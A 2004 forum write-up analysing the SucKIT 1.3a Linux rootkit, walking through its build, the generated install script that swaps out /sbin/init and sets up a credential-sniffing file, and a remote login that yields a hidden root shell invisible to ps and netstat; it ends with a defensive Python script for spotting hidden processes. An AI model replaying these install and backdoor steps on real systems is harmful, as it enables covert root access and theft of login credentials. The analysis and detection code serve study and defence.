
Analysis of the SuckIt-1.3a backdoor program

2004-12-8 04:19 | Submitted by: soft

Author: learning

I grabbed quite a few rootkit programs from http://www.ossec.net/rootkits/, and one of them, sk-1.3a, caught my attention. This is the program that was installed in the Debian server compromise a while back; it is what turned that incident into a chain of Debian servers being compromised one after another. I won't go into how the Debian servers were broken into; instead I'll analyse how the program itself works. The archive is named sk-1.3a.tar.gz, and I extracted it with tar -xvzf sk-1.3a.tar.gz on my Red Hat 7.2 box.

[[email protected] backdoor]# tar -xvzf sk-1.3a.tar.gz
sk-1.3a/
sk-1.3a/include/
sk-1.3a/include/types.h
sk-1.3a/include/sk.h
sk-1.3a/include/defs.h
sk-1.3a/include/extern.h
sk-1.3a/include/skarg.h
sk-1.3a/include/strasm.h
sk-1.3a/include/stuff.h
sk-1.3a/include/idt.h
sk-1.3a/include/skstr.h
sk-1.3a/include/rdata.h
sk-1.3a/include/sha1.h
sk-1.3a/include/lib.h
sk-1.3a/include/crypto.h
sk-1.3a/src/
sk-1.3a/src/main.c
sk-1.3a/src/kmem.c
sk-1.3a/src/pattern.c
sk-1.3a/src/kernel.c
sk-1.3a/src/printf.c
sk-1.3a/src/client.c
sk-1.3a/src/install.c
sk-1.3a/src/Makefile
sk-1.3a/src/sha1.c
sk-1.3a/src/zbin2oct.c
sk-1.3a/src/lib.c
sk-1.3a/src/crypto.c
sk-1.3a/src/backdoor.c
sk-1.3a/src/zlogin.c
sk-1.3a/src/zpass.c
sk-1.3a/Makefile
sk-1.3a/config
sk-1.3a/doc/
sk-1.3a/doc/README
sk-1.3a/doc/license
sk-1.3a/doc/CHANGES
sk-1.3a/doc/TODO
[[email protected] backdoor]# cd sk-1.3a
[[email protected] sk-1.3a]# ls
config doc include Makefile src
[[email protected] sk-1.3a]# make
Please do `make skconfig` in top level directory to generate configuration file.
make: *** [include/config.h] Error 1
(It tells us not to run make directly, but make skconfig first.)

[[email protected] sk-1.3a]# make skconfig
rm -f include/config.h sk login inst
make[1]: Entering directory `/root/backdoor/sk-1.3a/src'
make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'
make[1]: Entering directory `/root/backdoor/sk-1.3a/src'
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o pass
make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'
[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====]
[====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]
Please enter new rootkit password: (enter a password)
Again, just to be sure: (enter it again to confirm)
OK, new password set.
Home directory [/usr/share/locale/sk/.sk12]: (the default directory you land in when entering through the backdoor)
Magic file-hiding suffix [sk12]: (sk12 is the backdoor's hiding suffix; with ls -l you can see a .sniffer file, which captures the usernames and passwords of ssh, ftp, telnet and other remote logins; this is exactly why the Debian servers were compromised one after another)
Configuration saved. (the configuration is saved)
From now, _only_ this configuration will be used by generated
binaries till you do skconfig again.
To (re)build all of stuff type 'make' (now run make)

[[email protected] sk-1.3a]# make
make[1]: Entering directory `/root/backdoor/sk-1.3a/src'
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o login
rm -f sk kernel.o
make sk
make[2]: Entering directory `/root/backdoor/sk-1.3a/src'
make[3]: Entering directory `/root/backdoor/sk-1.3a/src'
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.c
gcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE "\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version" >> kernel.s
gcc -c kernel.s
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c pattern.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.c
make[3]: Leaving directory `/root/backdoor/sk-1.3a/src'
gcc -s -nostdlib *.o -o sk
make[2]: Leaving directory `/root/backdoor/sk-1.3a/src'
make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'
make[1]: Entering directory `/root/backdoor/sk-1.3a/src'
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2oct
make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'
cp -f src/login login
cp -f src/sk sk
Creating install script
echo "#!/bin/bash" > inst
echo "D=`cat include/config.h | grep HOME | awk {'print $3'}`" >> inst
echo "H=`cat include/config.h | grep HIDESTR | awk {'print $3'}`" >> inst
echo "mkdir -p \$D; cd \$D" >> inst
echo "echo > .sniffer; chmod 0622 .sniffer" >> inst
echo "echo -n -e `gzip -9 -c sk | src/bin2oct` | gzip -d > sk" >> inst
echo "chmod 0755 sk; if [ ! -f /sbin/init\${H} ]; " \
"then cp -f /sbin/init /sbin/init\${H}; fi;" \
"rm -f /sbin/init; cp sk /sbin/init" >> inst
Okay, file 'inst' is complete, self-installing script.
Just upload it somewhere, execute and you could log in using
./login binary.
Have fun!

[[email protected] sk-1.3a]# chmod +x inst (make the inst file executable)
[[email protected] sk-1.3a]# ./inst
Your home is /usr/share/locale/sk/.sk12, go there and type ./sk to install
us into memory. Have fun!
[[email protected] sk-1.3a]# ./sk (run the sk backdoor)
[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====]
[====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]
RK_Init: idt=0xc028f000, sct[]=0xc023e13c, kmalloc()=0xc012c180, gfp=0xf0
Z_Init: Allocating kernel-code memory...Done, 12902 bytes, base=0xc3dd8000
BD_Init: Starting backdoor daemon...Done, pid=1354 (the backdoor is loaded)
[[email protected] sk-1.3a]#

So what next? How do I log in remotely? What exactly has the system done after running these programs? Why do ps ax and netstat -alp show nothing suspicious? Well, if you could see it, it wouldn't be a rootkit. Don't worry, everything becomes clear in the steps below. What makes sk clever is that it can slip into the system silently through ports that are already in use. For example, if the system has DNS (53), FTP (21), SSH (22) or HTTP (80) open, the program can attach to those ports and enter the system in the guise of normal traffic, and netstat -alp shows no additional open service port. OK, the following steps expose how the program operates.

[[email protected] sk-1.3a]# ls
config doc include inst login Makefile sk src

See the login there? It is not the Linux system's own login program, but the key that opens the backdoor.

[[email protected] sk-1.3a]# ./login
[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====]
[====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]
use:
./login [hsditc] ...args
-h Specifies ip/hostname of host where is running suckitd (log in remotely to the server where the Suckit backdoor is running)
-s Specifies port where we should listen for incoming server' connection (if some firewalled etc), if not specified, we'll get some from os (specifies the port on the server running the Suckit backdoor; if not given, it scans to find a port that is open and enters through it)
-d Specifies port of service we could use for authentication echo, telnet, ssh, httpd... is probably good choice
-i Interval between request sends (in seconds)
-t Time we will wait for server before giving up (in seconds)
-c Connect timeout (in seconds)
[[email protected] sk-1.3a]#

Note that login is not run on the server where the backdoor is installed; you run login from another machine to log in remotely to the backdoored server. OK, I'll find another server, upload this login, and start sneaking in! Note: what follows is on a separate client machine, using login to connect remotely to the host where the backdoor was installed.

[[email protected]_server tmp]# ./login -h 192.168.1.2
[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====]
[====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]
Listening to port 34245
password: (enter the password you set when installing Suckit)
Trying 192.168.1.2:53...
connect: Connection refused (cannot log in)
Trying 192.168.1.2:79...
connect: Connection refused (cannot log in)
Trying 192.168.1.2:110...
connect: Connection refused (cannot log in)
Trying 192.168.1.2:220...
connect: Connection refused (cannot log in)
Trying 192.168.1.2:21...
connect: Connection refused (cannot log in)
Trying 192.168.1.2:22... (the ssh service is open; I'm going in)
Trying...
Et voila
Server connected.
Escape character is '^K'
[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====]
[====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]
[[email protected] .sk12]# (I'm finally in!)
[[email protected] .sk12]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:02:6B:00:2E:31
inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7612 errors:0 dropped:0 overruns:0 frame:0
TX packets:2634 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:777061 (758.8 Kb) TX bytes:360531 (352.0 Kb)
Interrupt:12 Base address:0x7000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:272 errors:0 dropped:0 overruns:0 frame:0
TX packets:272 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:19008 (18.5 Kb) TX bytes:19008 (18.5 Kb)
[[email protected] .sk12]# pwd
/usr/share/locale/sk/.sk12
[[email protected] .sk12]# (right, this is the default directory I land in)
[[email protected] .sk12]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
(I am god now)
[[email protected] .sk12]# who
root tty1 Jul 26 08:48
(This is the local login; there is no entry for the remotely logged-in account, so the hiding really works.)

Now the same commands on the backdoored server's own console:

[[email protected] root]# ps ax
PID TTY STAT TIME COMMAND
1 ? S 0:06 init [3]
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
4 ? SWN 0:00 [ksoftirqd_CPU0]
5 ? SW 0:00 [kswapd]
6 ? SW 0:00 [kreclaimd]
7 ? SW 0:00 [bdflush]
8 ? SW 0:00 [kupdated]
9 ? SW< 0:00 [mdrecoveryd]
20 ? SW 0:00 [kjournald]
98 ? SW 0:00 [khubd]
190 ? SW 0:00 [kjournald]
610 ? S 0:00 syslogd -m 0
615 ? S 0:00 klogd -2
635 ? S 0:00 portmap
653 ? S 0:00 /usr/sbin/sshd
679 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
723 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
724 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
725 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
726 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
727 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
732 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
733 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
734 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV
743 ? S 0:00 /usr/bin/postmaster -D /var/lib/pgsql/data
782 ? S 0:00 crond
790 tty2 S 0:00 /sbin/mingetty tty2
791 tty3 S 0:00 /sbin/mingetty tty3
792 tty4 S 0:00 /sbin/mingetty tty4
793 tty5 S 0:00 /sbin/mingetty tty5
794 tty6 S 0:00 /sbin/mingetty tty6
1108 tty1 S 0:00 login -- root
1386 tty1 S 0:00 -bash
1439 ? S 0:00 /usr/sbin/sshd
1440 pts/0 S 0:00 -bash
1483 pts/0 R 0:00 ps ax
[[email protected] root]# (This is the ps output on the server where I installed the Suckit backdoor; no suspicious program shows up, right?)

[[email protected] root]# netstat -alp
tcp 0 0 *:sunrpc *:* LISTEN 635/portmap
tcp 0 0 *:http *:* LISTEN 679/httpd
tcp 0 0 *:ssh *:* LISTEN 653/sshd
tcp 0 0 *:https *:* LISTEN 679/httpd
tcp 0 20 Learning:ssh 192.168.1.70:1874 ESTABLISHED 1439/sshd
udp 0 0 *:sunrpc *:* 635/portmap
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 1442 743/postmaster /tmp/.s.PGSQL.5432
unix 5 [ ] DGRAM 1142 610/syslogd /dev/log
unix 2 [ ] DGRAM 22557 1108/login -- root
unix 2 [ ] DGRAM 2207 782/crond
unix 2 [ ] DGRAM 1151 615/klogd
unix 2 [ ] STREAM CONNECTED 885 1/init [3]

Hmm, I can't see any suspicious port or connection either. Strange. Now let's look at the same thing from the shell obtained through the remote login. Ha, it's all plain to see!

[[email protected] .sk12]# ps ax
PID TTY STAT TIME COMMAND
1 ? S 0:06 init [3]
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
4 ? SWN 0:00 [ksoftirqd_CPU0]
5 ? SW 0:00 [kswapd]
6 ? SW 0:00 [kreclaimd]
7 ? SW 0:00 [bdflush]
8 ? SW 0:00 [kupdated]
9 ? SW< 0:00 [mdrecoveryd]
20 ? SW 0:00 [kjournald]
98 ? SW 0:00 [khubd]
190 ? SW 0:00 [kjournald]
610 ? S 0:00 syslogd -m 0
615 ? S 0:00 klogd -2
635 ? S 0:00 portmap
653 ? S 0:00 /usr/sbin/sshd
679 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
723 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
724 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
725 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
726 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
727 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
732 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
733 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
734 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT
743 ? S 0:00 /usr/bin/postmaster -D /var/lib/pgsql/data
782 ? S 0:00 crond
790 tty2 S 0:00 /sbin/mingetty tty2
791 tty3 S 0:00 /sbin/mingetty tty3
792 tty4 S 0:00 /sbin/mingetty tty4
793 tty5 S 0:00 /sbin/mingetty tty5
794 tty6 S 0:00 /sbin/mingetty tty6
1108 tty1 S 0:00 login -- root
1354 ? S 0:00 ./sk (there's the sk process)
1376 ttyp0 S 0:00 sh -i
1386 tty1 S 0:00 -bash
1439 ? S 0:00 /usr/sbin/sshd
1440 pts/0 S 0:00 -bash
1492 ttyp0 R 0:00 ps ax

[[email protected] .sk12]# netstat -alp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 *:sunrpc *:* LISTEN 635/portmap
tcp 0 0 *:http *:* LISTEN 679/httpd
tcp 0 0 *:ssh *:* LISTEN 653/sshd
tcp 0 0 *:https *:* LISTEN 679/httpd
tcp 0 0 Learning:1076 192.168.1.66:34245 ESTABLISHED 1374/sk
tcp 0 0 Learning:ssh 192.168.1.70:1874 ESTABLISHED 1439/sshd
udp 0 0 *:sunrpc *:* 635/portmap
raw 0 0 *:tcp *:* 7 1354/sk
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 1442 743/postmaster /tmp/.s.PGSQL.5432
unix 5 [ ] DGRAM 1142 610/syslogd /dev/log
unix 2 [ ] DGRAM 22557 1108/login -- root
unix 2 [ ] DGRAM 2207 782/crond
unix 2 [ ] DGRAM 1151 615/klogd
unix 2 [ ] STREAM CONNECTED 885 1/init [3]

See the lines marked in red (the two sk entries)? And it has opened a raw socket as well; found it. But unless you come in through the backdoor's own remote login, it is very hard to discover how to find the backdoor on the system. From the above you can see that Suckit lives up to its name: it latches onto the ports the server already has open, lets you log in remotely through them unnoticed, and stays hidden once you are in. ps, netstat and similar programs simply cannot tell whether this service is running. That is Suckit. It looks like removing the program will be hard too, but after some research it turns out not to be; you only need to be careful. Once I've written it up I'll show friends how to uninstall Suckit.

My knowledge is shallow and some of what I said above will make the experts laugh; if there are any mistakes, I ask the experts to correct me.
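The article's last comparison is the detection idea worth keeping: a rootkit that filters ps and netstat for one vantage point still has to answer honestly somewhere else, so diffing two views of the process table exposes what it hides. The following script is an added example (not code from the article or from SucKIT); it parses the two ps ax listings above, reports PIDs present in one view but not the other, and includes a live variant that compares /proc with kill(pid, 0). The sample listings are constructed from the article's output and trimmed.

```python
import os
import re

# Constructed sample input, cut down from the two `ps ax` listings in the
# article: the console view on the host and the view from the rootkit shell.
PS_CONSOLE = """\
  PID TTY      STAT   TIME COMMAND
 1386 tty1     S      0:00 -bash
 1439 ?        S      0:00 /usr/sbin/sshd
 1483 pts/0    R      0:00 ps ax
"""
PS_BACKDOOR = """\
  PID TTY      STAT   TIME COMMAND
 1354 ?        S      0:00 ./sk
 1376 ttyp0    S      0:00 sh -i
 1386 tty1     S      0:00 -bash
 1439 ?        S      0:00 /usr/sbin/sshd
 1492 ttyp0    R      0:00 ps ax
"""
PS_LINE = re.compile(r"^\s*(\d+)\s+\S+\s+\S+\s+\S+\s+(.*)$")

def parse_ps(text):
    """Return {pid: command} for a `ps ax` listing; the header does not match."""
    procs = {}
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if m:
            procs[int(m.group(1))] = m.group(2).strip()
    return procs

def hidden_processes(visible, reference):
    """PIDs the reference view shows but the visible view omits.  The `ps`
    process itself differs in every snapshot, so it is not reported."""
    vis, ref = parse_ps(visible), parse_ps(reference)
    return {pid: cmd for pid, cmd in ref.items()
            if pid not in vis and not cmd.startswith("ps ")}

def live_check(max_pid=32768):
    """Live variant (Linux only): PIDs that answer kill(pid, 0) but never
    appear in /proc are being filtered out of directory listings."""
    listed = {int(d) for d in os.listdir("/proc") if d.isdigit()}
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)          # signal 0: existence check, no effect
        except ProcessLookupError:
            continue
        except PermissionError:
            pass                     # exists but belongs to another user
        alive.add(pid)
    listed |= {int(d) for d in os.listdir("/proc") if d.isdigit()}
    return sorted(alive - listed)    # second listdir drops short-lived PIDs
```

A hit from live_check is only a candidate: confirm it with a second run and with a netstat-style comparison, since a short-lived process can still slip through the window between the scan and the listings.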




